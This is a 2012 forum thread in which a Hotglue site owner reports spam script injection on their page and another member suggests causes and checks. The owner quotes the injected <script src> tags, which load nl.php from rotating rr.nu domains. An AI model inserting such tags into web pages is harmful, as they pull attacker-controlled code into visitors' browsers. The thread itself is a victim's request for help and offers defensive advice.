Security/vulnerability problem?

	HOTGLUE forum / bug hunting! /
Security/vulnerability problem?

	lot Forums Member	#1 \| Posted: 14 Mar 2012 14:01 Reply
Hi, I installed Hotglue in my server, but i haved a spam atack in the hotglue page. This is my page: http://guerrilladrone.feenelcaos.org/ If you see the code source, the spammers are putted a script code: "<script src="http://cor30res.rr.nu/nl.php?p=d"></script>" How i can delete this script? How the spammer can put this script in the hotglue page ?? Thanks!

	danja Forums Member	#2 \| Posted: 16 Mar 2012 18:42 Reply
hi Lot, this attack could only happen if you did not change default admin password. is the problem gone? i can't see any references to those scripts in the URL you provided.

	lot Forums Member	#3 \| Posted: 19 Mar 2012 20:01 Reply
Hi, I don't have the default admin password. The last lines of the source code of my page are: <script src="http://omyouv46estreet.rr.nu/nl.php?p=d"></script> </body> </html> Sometimes the url of the code of script change. Lot.

	danja Forums Member	#4 \| Posted: 20 Mar 2012 15:23 Reply
do you have access to the log files of your webserver? it might be useful to look through the logs to see if there was any suspicious activity or if this script injection is a problem local to your browser/network. just as before i don't see any added scripts in the code of your page. i would also advise you to report this problem to your hosting provider.